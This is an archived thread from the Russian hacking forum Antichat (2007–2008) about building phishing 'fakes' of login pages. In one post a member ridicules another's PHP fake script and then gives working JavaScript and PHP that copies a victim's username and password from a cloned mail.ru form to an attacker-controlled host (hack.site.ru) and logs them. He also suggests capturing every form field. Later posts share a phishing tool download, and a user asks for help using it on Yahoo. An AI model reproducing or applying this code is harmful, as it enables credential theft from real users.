ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО_OLD > Статьи > Избранное
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 16.08.2007, 23:24
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sadden  
О чем ты?
Ну просто, проверка, возможна ли работа с сокетами.
 

  #32  
Старый 17.08.2007, 14:32
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Цитата:
Мне скажи.
поищи в теме про бесплатные хостинги мои посты. Я там по-моему говорил.
я не жадный. ниче не скрываю от вас, други мои))
 

  #33  
Старый 17.08.2007, 17:23
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

Да простит меня автор).
Скриптик жесть....Чисто поржать.

Я такую ***ню давно не встречал. Этож как надо пхп испоганить чтобы такое написать =(. Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
Цитата:
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// Меняем post на get, потому что $_SERVER["QUERY_STRING"] кушает тока пост
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

$full_page = str_replace("method=\"POST\"","method=\"get\"",$fu ll_page);
$full_page = str_replace("method='POST'","method='get'",$full_p age);
$full_page = str_replace("method=POST","method=get",$full_page) ;
$full_page = str_replace("method=\"post\"","method=\"get\"",$fu ll_page);
$full_page = str_replace("method='post'","method='get'",$full_p age);
$full_page = str_replace("method=post","method=get",$full_page) ;
Вот тут я начал истерично ржать. А если на сайте, данные доступны тока через пост?
И еще убила замена через str_replace, тут регулярки нужны а не перечисливать десятки вариаций.

Цитата:
@$sss=fsockopen($fakable_host,80)
Строка убийство.

Цитата:
// - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// Меняем пути к картинкам (придёца юзать сокет 2-й раз)
// - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Бугога.

Цитата:
if(strpos($match[0],"http://")===false)
Ну тут сделаем вид что все заебись.

Цитата:
or die("Бля ошибка, твои пароли не сохранились");
Конструкцию or die надо 100% юзать, ведь при малейшем глюке, жертва должна видеть ,почему ее пароли не остались у хакера.


Цитата:
$line=ereg_replace($replace, "", $line);
Конечно, когда не нужны регулярки, их надо юзать.

Цитата:
$request .= "Content-Type: application/x-www-form-urlencoded\n";
А зачем это в методе GET?

Цитата:
header("Location: $redirect_to");
Тут вижу целых 2 помарки.

"$var" и вторая, это опять что в скрипте есть вывод текста, а хидер не может быть вызван после того как текст отобразился на экране....И тут будет целый камнепад из ошибок скрипта.


Мое резюме: Скрипт полностью не пригоден по работе, возможность того что он спалится, работает пиздец как медленно, сделать фейк вручную быстрее чем настроить этот скрипт.
Вывод: скрипт надо стереть пока его никто не видел.

Цитата:
Да и работать с ссл надо по отбельной схеме, если я не ошибаюсь.
Ды да.

Цитата:
$sock=fsockopen('mail.ru',80,$errno, $errstr); //http
$sock=fsockopen('ssl://mail.ru',443,$errno, $errstr); //https
Вот и вся разница между http и https.


Для тех кто хочет сделать нормальный фейк, объясняю:
Можно сделать два вида фейка, статичный и динамичный. Статичный вы один раз спиздили с сайта html налепили к себе и довольны. Второй динамичный. Каждый раз вы сокетами пиздете html с сайта и изменяет нужные вам данные.

Чем плох фейк от бузи кодера, тем что нарушается работа и структура исходного кода. Потом идёт редирект впустую.

Смысл нормального фейка ,чтобы минимум произвести изменений в сурсе, абсолютно не нарушая его работы. Чтобы данные отослались сразу куда надо, а не на сниффер.

Сделаем это через javascript.

Создаем два постоянных файла sniff.js и sniff.php

sniff.js // Отсылает даные на снифер
Цитата:
function sniff(p)
{
var img = document.createElement("img");
img.src='http://hack.site.ru/sniff.php?account='+p;
img.style.cssText='display: none';
document.body.appendChild(img);
}
sniff.php // Логер
Цитата:
<?php
$file=fopen('log.txt','w');
fwrite($file,$_GET['account']);
fclose($file);
?>
Всё, с нашими файлами закончено. Они будут пригодня для всех фейков, так что трогать их не надо.

Терь будем изменять сурс фейка.

1) Подключаем наш яваскрипт.
Цитата:
<script type="text/javascript" src="http://hack.site.ru/sniff.js"></script>
2) Меняем исходные ссылки, на ссылки на фейк
Цитата:
<base href="http://mail.ru">
3) На форму добавим обработчик OnSubmit
Цитата:
<form name...bla.bla.bla OnSubmit="sniff(this.username.value+':'+this.passw ord.value);">
Как только юзер сделает отправку данных, создатся пустой объект картинки(невидимый), при запросе этой картинки, и сработает сниффер, а данные полетят куда им надо, т.е. никакого посредничества и разрыва нету.
Всё...фейк готов. Для универсальности, можно в логере, для каждого случая писать новый лог. А в обработчеке форм, пиздить не тока известные поля, а перехватывать содержимое ВСЕХ элементов форумы.


Удачи.
 

  #34  
Старый 17.08.2007, 17:49
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

Убейте меня. Я жить после такого позора не могу.
 

  #35  
Старый 17.08.2007, 19:46
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

Цитата:
Убейте меня. Я жить после такого позора не могу.
Да ладно тебе) все нормально. Со всеми бывает)
 

  #36  
Старый 17.08.2007, 20:57
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Цитата:
Сообщение от Бузя  
Убейте меня. Я жить после такого позора не могу.
не бзди. Ибо тут
>> Скрипты подобны тем что пишут киберлорды и у зуклон тимы.
пропущен еще и мой ник))
 

  #37  
Старый 06.01.2008, 03:14
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

aNYfAKE v.1.1


Как настроить читаем на главной странице либо на скрине

Скачать: aNYfAKE_v.1.1.rar | Official
Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com

Последний раз редактировалось Isis; 06.01.2008 в 03:17..
 

  #38  
Старый 06.01.2008, 07:56
zloy_admin
Познающий
Регистрация: 04.01.2008
Сообщений: 31
Провел на форуме:
166583

Репутация: 15
По умолчанию

Isis,
c yahoo не получается... может подскажешь настройки?
 

  #39  
Старый 06.01.2008, 08:33
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Блин я привык руками
 

  #40  
Старый 06.01.2008, 08:45
zloy_admin
Познающий
Регистрация: 04.01.2008
Сообщений: 31
Провел на форуме:
166583

Репутация: 15
По умолчанию

руками не умею. маленький еще
а вот с помощью проги....
Может кто поможет с настройками?
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ